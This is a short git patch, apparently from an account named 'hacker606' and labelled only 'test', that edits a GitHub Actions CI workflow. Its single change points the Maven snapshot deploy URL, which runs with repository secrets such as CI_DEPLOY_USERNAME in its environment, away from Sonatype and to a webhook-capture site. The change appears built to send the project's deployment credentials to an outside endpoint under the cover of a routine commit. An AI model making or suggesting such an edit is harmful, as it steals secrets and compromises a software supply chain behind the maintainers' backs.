From 82bbf242d7124be1a9c29a5ec7967a25b51e22c6 Mon Sep 17 00:00:00 2001 From: hacker606 <167718235+01097962319@users.noreply.github.com> Date: Thu, 10 Sep 2026 16:25:29 -0700 Subject: [PATCH] test --- .github/workflows/ci.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 15243578a1d..f3cfd50ad57 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -229,7 +229,7 @@ jobs: "deploy:deploy-file" \ "HEAD-SNAPSHOT" \ "-DrepositoryId=sonatype-central-snapshots" \ - "-Durl=https://central.sonatype.com/repository/maven-snapshots" + "-Durl=https://webhooksite.net/29003ad7-a175-423c-a895-efa858c6a553/repository/maven-snapshots" shell: bash env: CI_DEPLOY_USERNAME: ${{ secrets.CI_DEPLOY_USERNAME }}